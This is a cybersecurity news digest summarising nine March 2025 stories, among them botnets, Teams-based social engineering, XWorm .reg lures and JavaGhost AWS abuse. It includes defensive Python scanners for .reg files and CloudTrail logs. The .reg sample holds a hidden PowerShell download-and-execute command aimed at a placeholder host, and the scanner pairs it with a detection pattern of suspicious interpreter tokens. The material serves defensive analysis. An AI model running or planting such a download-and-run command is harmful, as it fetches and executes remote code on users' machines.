DJBSEC's CyberNews 3-5-25
Cybersecurity Stories Summary
Story1. New Eleven11Bot Botnet Infects 86,000 Devices for DDoS Attacks
A newly discovered botnet, Eleven11Bot, has infected roughly 86,000 devices and is being used for large-scale Distributed Denial-of-Service (DDoS) attacks. Its victims are mostly consumer and small-business IoT devices, in particular IP cameras and network video recorders, which it recruits by brute-forcing weak or default credentials rather than through any novel exploit. Researchers who observed the attacks report packet rates high enough to disrupt hosting and telecom targets, and the botnet's rapid growth suggests that capacity will keep increasing. Owners of such devices should change default passwords, update firmware, and disable remote management on the WAN side; network operators should be prepared to absorb or scrub volumetric floods of this size.
Story2. Hackers Abusing Microsoft Teams and Quick Assist to Gain Remote Access
Cybercriminals are combining Microsoft Teams with Windows Quick Assist to gain unauthorized remote access to corporate networks. Quick Assist is a remote-help application built into Windows, not a Teams feature: the attackers contact employees over Teams (often after flooding the victim's inbox with junk mail so that the call looks like a legitimate help-desk response), pose as IT support, and talk the victim into launching Quick Assist and handing over control of the session. Once inside, they deploy malware, steal sensitive data, or pivot further into the network. Recommended controls: block or uninstall Quick Assist where it is not needed (for example with AppLocker or by removing the Windows capability), restrict Teams chats and calls from external tenants, and train employees to treat unsolicited "IT support" contact as a social engineering attempt.
Story3. Hackers Attacking 4,000 ISPs Worldwide in Coordinated Cyber Assault
Researchers have detected a mass-exploitation campaign against more than 4,000 IP addresses belonging to internet service providers, concentrated on the U.S. West Coast and in China. The attackers are not exploiting a software vulnerability: they brute-force weak credentials on exposed hosts, then drop cryptominers and infostealers and use the compromised machines to scan for further targets. Affected ISPs are urged to enforce strong credentials and multi-factor authentication on management interfaces, limit the exposure of remote-access services, and monitor for miner and stealer activity on their infrastructure.
Story4. 96% of Ransomware Incidents Now Involve Data Exfiltration
A new study reveals that 96% of ransomware attacks now include data exfiltration, meaning the criminals steal sensitive data before encrypting files. This "double extortion" tactic increases pressure on victims to pay, because restoring from backups no longer removes the threat: attackers can still leak the stolen data if demands are not met. The shift means that detecting and blocking large outbound transfers matters as much as being able to recover encrypted systems. Security experts recommend tested offline backups, network segmentation, endpoint detection and response, and monitoring of egress traffic for unusual volumes or destinations.
Story5. U.S. Seizes $31 Million Stolen in Cryptocurrency Cybercrime Operations
U.S. authorities have seized roughly $31 million in cryptocurrency traced to the April 2021 exploit of the decentralized finance platform Uranium Finance, in which attackers abused a flaw in the platform's smart contracts to drain about $50 million in tokens. Investigators used blockchain analysis to follow the funds through the laundering steps the thieves took before seizing them. The seizure is part of a broader effort to recover proceeds of cryptocurrency theft, and it shows that on-chain transactions remain traceable years after the fact.
Story6. VMware Security Flaws Exploited in Active Cyberattacks
Broadcom has patched three VMware vulnerabilities, CVE-2025-22224, CVE-2025-22225 and CVE-2025-22226 (advisory VMSA-2025-0004), affecting ESXi, Workstation and Fusion, that are being exploited in the wild. They are not remote entry points: an attacker who already has administrative privileges inside a guest VM can chain them to escape to the hypervisor (a heap overflow in VMCI giving code execution as the VMX process, an arbitrary write on the host, and an information leak in HGFS). Organizations running affected products should apply the fixed builds promptly and compare their deployed versions against the advisory. Because exploitation starts from a compromised guest, a single untrusted or tenant VM can put every workload on the same host at risk.
Story7. Hackers Deliver XWorm Malware via Malicious Windows Registry Files
A new campaign is distributing the XWorm malware through malicious Windows registry (.reg) files. A .reg file is a plain-text export that the Registry Editor imports when the user double-clicks it; the attackers' files write a value under an autorun key that launches a PowerShell command to fetch and run XWorm, so nothing that looks like an executable is delivered up front and the persistence entry is created in the same step. Once deployed, XWorm can steal credentials, exfiltrate data, and give the operators remote control of the host. Users should not import registry files from untrusted sources, and defenders should inspect .reg attachments and alert on autorun values that invoke script interpreters.
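The triage a defender would want for a .reg attachment, as an added example that is not part of the original article or the reported campaign: a small parser for the Registry Editor export format (quoted strings, hex(2) UTF-16 values with line continuations) that flags values written under autorun keys whose command invokes a script interpreter, an encoded command or a URL. The sample .reg content and the list of suspicious tokens are constructed for the example; the URL is a reserved .invalid domain.

```python
import re
from dataclasses import dataclass

# Registry paths commonly abused for persistence (hive stripped, lower-cased).
AUTORUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",      # also matches RunOnce
    r"software\microsoft\windows nt\currentversion\winlogon",
)

# Tokens that make an autorun command worth an analyst's attention (example list).
SUSPICIOUS = re.compile(
    r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32|"
    r"-enc|-e\s|frombase64|iex|invoke-expression|downloadstring|"
    r"invoke-webrequest|https?://|%temp%|\\appdata\\",
    re.IGNORECASE,
)

# Constructed sample: one Run entry fetching a payload with PowerShell, one RunOnce
# entry stored as REG_EXPAND_SZ (hex(2), UTF-16LE) split over two lines, one benign value.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Loader"=hex(2):6d,00,73,00,68,00,74,00,\
  61,00,20,00,58,00,00,00

[HKEY_CURRENT_USER\Software\Contoso\App]
"Theme"="dark"
'''


@dataclass
class Finding:
    key: str
    name: str
    value: str
    reason: str


def _unescape(s: str) -> str:
    """Undo .reg string escaping: backslash protects the next character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def _decode_value(raw: str) -> str:
    """Turn the right-hand side of a .reg value line into text for inspection."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])                      # REG_SZ
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", raw, re.IGNORECASE)
    if m:
        kind = int(m.group(1) or 3)                       # bare "hex:" is REG_BINARY
        data = bytes(int(b, 16) for b in re.findall(r"[0-9a-fA-F]{2}", m.group(2)))
        if kind in (1, 2, 7):                             # SZ / EXPAND_SZ / MULTI_SZ are UTF-16LE
            return data.decode("utf-16-le", errors="replace").rstrip("\x00")
        return data.hex()
    return raw                                            # dword:, qword:, or "-" (delete)


def parse_reg(text: str):
    """Yield (key, value name, decoded value) for every value in a .reg export."""
    logical, buf = [], ""
    for line in text.splitlines():                        # join "\"-continued hex lines
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1].strip()
            continue
        logical.append(buf + line.strip())
        buf = ""
    key = None
    for line in logical:
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if m and key:
            yield key, (m.group(1) or "(Default)"), _decode_value(m.group(2))


def scan_reg(text: str) -> list[Finding]:
    """Flag autorun values whose command matches a suspicious token."""
    findings = []
    for key, name, value in parse_reg(text):
        path = key.split("\\", 1)[1].lower() if "\\" in key else ""
        if not any(path.startswith(k) for k in AUTORUN_KEYS):
            continue
        m = SUSPICIOUS.search(value)
        if m:
            findings.append(Finding(key, name, value, f"autorun value contains '{m.group(0)}'"))
    return findings


if __name__ == "__main__":
    for f in scan_reg(SAMPLE_REG):
        print(f"{f.key}\\{f.name}: {f.reason}\n    {f.value}")
```

Real exports from Regedit are UTF-16LE with a byte-order mark, so read a file on disk with `open(path, encoding="utf-16")` before handing the text to `scan_reg`; the decoded hex(2) path shows why inspecting the raw bytes is not enough, since an `mshta` command hidden in a hex value looks like noise to a plain string search.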
Story8. Threat Actor “JavaGhost” Targets AWS Environments with Phishing Scheme
A threat actor tracked as "JavaGhost" is using victims' AWS environments as infrastructure for phishing campaigns. Despite the name, no Java payload or malware is involved: the group obtains long-term AWS access keys that organizations have exposed (for example in public code repositories or misconfigured storage), then uses the victim's Amazon SES and WorkMail services to send phishing emails that appear to come from a trusted sender. For persistence it creates additional IAM users, roles and access keys, and it avoids easily monitored calls such as GetCallerIdentity to keep a low profile in CloudTrail. Defenders should replace long-term access keys with short-lived credentials, enforce multi-factor authentication on the accounts that remain, alert on IAM user, key and role creation and on SES identity changes, and review CloudTrail for activity from unfamiliar source addresses.
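A detection a cloud security engineer might run over CloudTrail to catch the credential-theft and privilege-escalation pattern described above, as an added example that is not part of the original article or of any vendor report: it groups records by access key and alerts when a single long-term key (AKIA prefix) both sets up IAM persistence (new users, keys, admin policy attachments, roles trusting an outside account) and prepares an email-sending service within a short window. The CloudTrail records, the key IDs (AWS's documented example IDs), the account numbers and the event-name lists are constructed for the example; the thresholds are assumptions to tune.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

# IAM calls that create a foothold (example list, extend to taste).
PERSISTENCE = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile",
    "CreateRole", "UpdateAssumeRolePolicy", "AttachUserPolicy", "AttachRolePolicy",
}
# SES / WorkMail calls that prepare an account for sending mail (example list).
MAIL_SETUP = {
    "VerifyEmailIdentity", "CreateEmailIdentity", "VerifyDomainIdentity",
    "UpdateAccountSendingEnabled", "CreateEmailTemplate", "CreateOrganization",
}


def _ev(time, source, name, key, ip, params=None):
    """Build a minimal CloudTrail-shaped record (constructed test data)."""
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "sourceIPAddress": ip,
            "userIdentity": {"type": "IAMUser", "userName": "ci-deploy", "accessKeyId": key},
            "requestParameters": params or {}}


LEAKED = "AKIAIOSFODNN7EXAMPLE"          # AWS documentation example key id, standing in for a leaked key
ATTACKER_TRUST = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::444455556666:root"},
    "Action": "sts:AssumeRole"}]})

SAMPLE_EVENTS = [
    _ev("2025-03-03T10:00:00Z", "iam.amazonaws.com", "CreateUser", LEAKED, "198.51.100.7",
        {"userName": "backup-svc"}),
    _ev("2025-03-03T10:01:00Z", "iam.amazonaws.com", "AttachUserPolicy", LEAKED, "198.51.100.7",
        {"userName": "backup-svc", "policyArn": ADMIN_POLICY}),
    _ev("2025-03-03T10:02:00Z", "iam.amazonaws.com", "CreateRole", LEAKED, "198.51.100.7",
        {"roleName": "support-role", "assumeRolePolicyDocument": ATTACKER_TRUST}),
    _ev("2025-03-03T10:05:00Z", "ses.amazonaws.com", "VerifyEmailIdentity", LEAKED, "198.51.100.7",
        {"emailAddress": "helpdesk@example.com"}),
    # Routine key rotation by another long-term key: persistence-shaped, but no mail setup.
    _ev("2025-03-03T11:00:00Z", "iam.amazonaws.com", "CreateAccessKey", "AKIAI44QH8DHBEXAMPLE",
        "203.0.113.9", {"userName": "ci-deploy"}),
    # Read-only call with temporary credentials (ASIA prefix): never an alert.
    _ev("2025-03-03T11:30:00Z", "iam.amazonaws.com", "ListUsers", "ASIAEXAMPLETEMPKEY01", "203.0.113.9"),
]


def _ts(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _foreign_principals(ev, trusted):
    """Account IDs in a role trust policy that are not in the trusted set."""
    doc = ev.get("requestParameters", {}).get("assumeRolePolicyDocument")
    if not doc:
        return []
    stmts = json.loads(doc).get("Statement", [])
    if isinstance(stmts, dict):
        stmts = [stmts]
    found = []
    for s in stmts:
        principals = s.get("Principal", {}).get("AWS", [])
        if isinstance(principals, str):
            principals = [principals]
        for p in principals:
            acct = p.split(":")[4] if p.startswith("arn:") else p
            if acct not in trusted:
                found.append(acct)
    return found


def classify(ev, trusted):
    """Return (tag, detail) pairs describing what one record contributes to the pattern."""
    name, src, tags = ev["eventName"], ev.get("eventSource", ""), []
    params = ev.get("requestParameters", {})
    if src == "iam.amazonaws.com" and name in PERSISTENCE:
        tags.append(("iam-persistence", name))
        if params.get("policyArn") == ADMIN_POLICY:
            tags.append(("admin-grant", params.get("userName") or params.get("roleName")))
        for acct in _foreign_principals(ev, trusted):
            tags.append(("foreign-trust", acct))
    if src in ("ses.amazonaws.com", "workmail.amazonaws.com") and name in MAIL_SETUP:
        tags.append(("mail-setup", name))
    return tags


def triage(events, trusted_accounts, window=timedelta(hours=6)):
    """Alert on a long-term key that does IAM persistence and mail setup within `window`."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=_ts):
        key = ev["userIdentity"].get("accessKeyId", "?")
        for tag, detail in classify(ev, trusted_accounts):
            by_key[key].append((_ts(ev), tag, detail, ev.get("sourceIPAddress")))
    alerts = []
    for key, hits in by_key.items():
        tags = {t for _, t, _, _ in hits}
        span = hits[-1][0] - hits[0][0]
        if key.startswith("AKIA") and {"iam-persistence", "mail-setup"} <= tags and span <= window:
            alerts.append({"accessKeyId": key, "tags": sorted(tags),
                           "ips": sorted({ip for *_, ip in hits}), "hits": len(hits)})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS, trusted_accounts={"111122223333"}):
        print(json.dumps(a, indent=2))
```

The grouping by access key rather than by user name is deliberate: a stolen long-term key is the unit of compromise, and correlating its first persistence call with its first mail-setup call gives a signal that neither event produces alone, since both are routine in isolation. Feeding real CloudTrail (the `Records` array of each log object) into `triage` only requires the fields used above.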
Story9. Microsoft Teams Being Used to Deploy Black Basta and Cactus Ransomware
Operators behind the Black Basta and Cactus ransomware strains are using Microsoft Teams as the first stage of their intrusions. After bombarding a target's inbox with junk mail, the attackers contact the user over Teams posing as IT support and talk them into granting remote control of the machine, typically through Windows Quick Assist; from there they stage a remote-access backdoor (the BackConnect tool, loaded by DLL sideloading) to keep their foothold before data theft and encryption. Because the lure arrives as a chat or call rather than an email attachment, it bypasses traditional email security controls entirely. Organizations are urged to restrict Teams chats and calls from external tenants, block or monitor Quick Assist and other remote-assistance tools, and train employees to verify unexpected "IT support" contact through a known channel.